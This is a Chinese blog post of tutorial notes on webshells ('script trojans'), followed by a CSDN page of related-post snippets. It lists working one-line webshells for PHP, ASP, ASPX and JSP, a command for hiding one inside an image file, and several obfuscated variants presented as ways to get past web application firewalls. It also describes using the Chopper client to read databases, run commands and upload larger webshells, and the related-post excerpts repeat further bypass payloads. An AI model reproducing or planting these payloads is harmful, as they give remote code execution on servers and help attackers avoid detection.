某教程学习笔记(一):13、脚本木马原理

最新推荐文章于 2023-10-24 10:55:09 发布
最新推荐文章于 2023-10-24 10:55:09 发布
阅读量635 收藏 3
点赞数
分类专栏: 某教程学习笔记 文章标签: 学习笔记 脚本木马 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/104505471
版权

我和她说,如果有天你要离开我,你就跟我掰手腕,赢了你就让你走,她说我那么瘦小怎么会赢。后来她真的要和我分手,我把右手放在桌子上,眼看我要赢的时候,她把左手放到右手上,我抬头看她咬着牙眼里含着泪,我知道她真得要离开我了。。。

                                                                                                                                   ----  网易云热评

一、一句话木马,隐蔽性强,功能强大,为上传大马做准备

1、php一句话

<?php @eval($_POST['aiyou']);?>

将一句话上传到服务器
在这里插入图片描述
用菜刀连接
在这里插入图片描述
在这里插入图片描述
读取数据库
在这里插入图片描述
终端运行命令
在这里插入图片描述
2、asp一句话

<% eval request(“aiyou”) %>

3、aspx一句话

<%@ Page Language=“Jscript”%>

<%eval(Request.Item[“value”],“unsafe”);%>

4、jsp一句话

<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>

5、图片马

cmd下做一句话

copy /b1.jpg+1.php 2.jpg
在这里插入图片描述
C32ASM做一句话
在这里插入图片描述
二、一句话变形,waf会拦截一句话,可以通过变形绕过

<?php $_request['a']($_request['b']); ?>

<%eval(request(chr(112)))%>

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“aiyou”))%>

<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&-"&“5”&")"&")")%>

<%a=request(“aiyou”)%><%eval a%>

三、大马,功能比小马的功能更加强大

上传小马后用菜刀连接,然后再通过菜刀上传大马
在这里插入图片描述
禁止非法,后果自负

欢迎关注公众号:web安全工具库

在这里插入图片描述

web安全工具库
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Lumerical FDTD Solutions Scrip脚本语言官方教程学习笔记
05-17
本资源为Lumerical FDTD Solutions Scrip脚本语言的官方教程学习笔记,由个人在官方Script基本教学视频中学习并整理得到,对于快速入门Lumerical脚本语言,并将其应用于仿真当中具有一定的价值。Lumerical FDTD采用的是Lumerical Script Language命令语言。和matlab之间存在一定的相似关系,很多matlab中的语法可以直接在Lumerical脚本语言中实现。Lumerical脚本文件的扩展名为.lsf。熟练掌握该语言能够大大提高FDTD的仿真及结果分析效率,避免的图形化界面中繁琐的操作步骤,是FDTD初学者在了解软件基本工作方式后,需要进一步进阶学习的内容。
利用http漏洞获取权限
快递小哥的博客
12-31 660
环境:一台win3虚拟机 一台物理机 1. 保证物理机和虚拟机在同一网段且能相互ping通 2.在虚拟机上安装iis服务器 3.开放权限 4.在物理机桌面建立一个txt文件,里面内置木马 如:1.txt <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)...
免杀一句话2
cc1988429的专栏
04-18 906
ASP系列         (密码是-7)     PHP系列             @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                   @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                   @$_/*-/*-*/(
文件上传(最后几题)
weixin_46601374的博客
03-01 1982
话说各位友友们,有没有看过《中华人民共和国网络安全法》 没别的意思,就是想让大家看看 IIS6.0解析漏洞 IIS6.0解析漏洞,其实有一些不如说是IIS6.0的一些特性,严格意义上而言,只是一些默认配置并不是漏洞 但是也有一些的确是漏洞 IIS6.0解析漏洞(一): IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx 也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx 都会调用 asp.dll
CTFshow--web入门--文件上传
qq_46874275的博客
04-24 1813
~目录~开始web151 改后缀 / 禁jsweb152 改后缀web153 .user.iniweb154、155 .user.ini + 短标签web156 {}web157、158、159 反引号执行命令web160 日志包含绕过web161 幻术文件头web162、163 session文件包含+条件竞争 开始 挑简单的先来 web151 改后缀 / 禁js 上传一个一句话,要求是图片格式,否则传不上去 <?php @eval($_POST['a']) ?> 然后抓包修改后缀为php
渗透测试 - 一句话大全_cracer-CSDN
m0_67888657的博客
07-13 114
一句话:可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件的最底部不会出错!无防下载表,有防下载表可尝试插入以下语句突破的一句话。不用''的asp一句话。可以躲过雷客图的一句话。以下这个ASP一句话。不用双引号的一句话。
【Oracle】Oracle中chr()的含义
zclinux的博客
11-21 7350
oracle中chr含义 CHR(10)和 CHR(13)——在oracle都为换行 chr(32)——表示空格 DECLARE   v_a VARCHAR2(255);   v_b VARCHAR2(255); BEGIN   SELECT 'a' || chr(9) || 'b' INTO v_b FROM dual;   v_a := 'a  b'; --a和b之间是tab键
记一次公司项目上的常规渗透测试
最新发布
LiBai'S BLOG
10-24 3万+
授权项目下常规的渗透测试。欢迎朋友们积极投稿,投稿有奖励。在进行常规的渗透测试时,看到功能点要进行挨个测试,指不定就有漏洞,细心一点干就完了。授权项目上的渗透测试,漏洞有网站弱口令—存储型XSS—文件上传。本文由知识星球《网络安全情报攻防站》星友。由于是内网业务系统一发直接干进去了。首页啥都没有,找到网站后台。试试admin\admin。测试完毕,编写报告交差。
常见PHP危险函数验证
qq_46567150的博客
09-29 417
1eval 语句 eval()会将符合PHP 语法规范字符串当作php 代码执行。 1.1 示例: 首先在服务器端创建PHP脚本文件,构建危险语句,脚本代码如下: <?php $code = empty($_REQUEST['code'])?'phpinfo();':$_REQUEST['code']; eval($code); // phpStudy-2016 后门的原理 ?> 首先定义一个变量“$code”,并进行判断是否...
SQL注入绕过
m0_47599604的博客
03-11 274
目录 asp木马收集 简单的aspx免杀 过狗的一句话 双写绕过 常见绕过思路 绕过空格的过滤 SQL注入防御 asp木马收集 <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Request(chr(35
Python廖雪峰教程学习笔记:Day11
01-20
养成一个好的习惯只需要坚持21天,Day11 这两天主要学习一下面向对象的高级编程。 使用__slots__ 由之前学习类的定义和实例的创建,我们可以给实例绑定不同的属性,例如: class Student(object): pass s = Student...
Python廖雪峰教程学习笔记:Day14
12-22
养成一个好的习惯只需要坚持21天,Day14 什是JSON? JSON是轻量级的文本数据交换格式,指的是 JavaScript 对象表示法(JavaScript Object Notation),类似XML但又比 XML 更小、更快,更易解析。 JSON语法 JSON数据...
linux运维学习笔记:Shell脚本调试.pdf
08-18
linux运维学习笔记:Shell脚本调试
Python廖雪峰教程学习笔记:Day7
12-23
果然养成一个好的习惯不容易,丢掉一个好的习惯确是轻而易举,我不知道自己能坚持这个习惯多久,但是我会把每天写一篇学习博客的事情放在心上。自己写的博客可能不能帮助别人学到什么,但是这种总结归纳从一定程度上...
分享下我的双功能免杀asp小马 超强版
weixin_33725239的博客
08-30 397
转自:八神 第一款 : GIF89a$ ;<hTml> <%eval request(chr(1))%> <% on error resume next testfile=Request.form("filepath") msg=Request.form("message") if Trim(request("...
BUUCTF刷题记录(7)
bmth666的博客
10-16 1953
文章目录web[NPUCTF2020]ReadlezPHP web 打ctf(×) 被ctf打(√) [NPUCTF2020]ReadlezPHP 我反序列化真不行,需要多理解理解这方面的内容。 打开用view-source:查看源码,得到信息 进入得到代码,为反序列化 <?php #error_reporting(0); class HelloPhp { public $a; ...
CTF常用知识点整理(个人刷题中整理)
Hopeace的博客
07-19 4178
由于是之前刷题的整理,参照了很多大神的博客,由于过于零碎,没能记录下各位大神的文章出处(以后会提高版权意识的),如有侵权,私聊补加出处或者删文章。 博主是入门半年的萌新,文章不可避免会有很多错误,还请大家指正。 ### **PHP** var_dump( ) 以列的形式展开数据,方便查看 scandir( ) 扫描某一文件夹目录 file_get_contents( ) 读取文件,拼接用'.' 如num=file_get_contents(chr(47...
GIF89a
weixin_59392781的博客
09-15 1924
GIF89a <script language="php">eval($_GET[shell])</script> 当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马
一句话木马过狗 php,各种过安全狗一句话木马asp,php,aspx一句话木马
weixin_30476025的博客
03-09 960
几个变性的asp–过防火墙 过狗效果都不错< %eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“sz”))%>(“e”&”v”&”a”&”l”&”(“&”r”&”e”&”q”&”u”&”e”&”s”&am...
java ml介绍_Java学习笔记一:数据类型I
06-09
Java是一种面向对象的编程语言,广泛应用于各种应用程序的开发,包括机器学习。在Java中,数据类型是程序设计的基本构建块之一。Java中的数据类型可以分为两类:基本数据类型和引用数据类型。 Java的基本数据类型包括:byte、short、int、long、float、double、char和boolean。这些数据类型是原始的、简单的数据类型,可以直接在内存中存储和操作。 Java的引用数据类型包括:类、接口、数组和枚举。这些数据类型是由程序员定义的,它们的实例在内存中是以引用的形式存储的。 在机器学习中,Java通常被用于开发和部署机器学习模型,尤其是在企业级应用中。Java的机器学习库包括Weka、Mahout和DeepLearning4j等。这些库提供了各种机器学习算法和工具,使得Java成为一个非常有用的机器学习平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值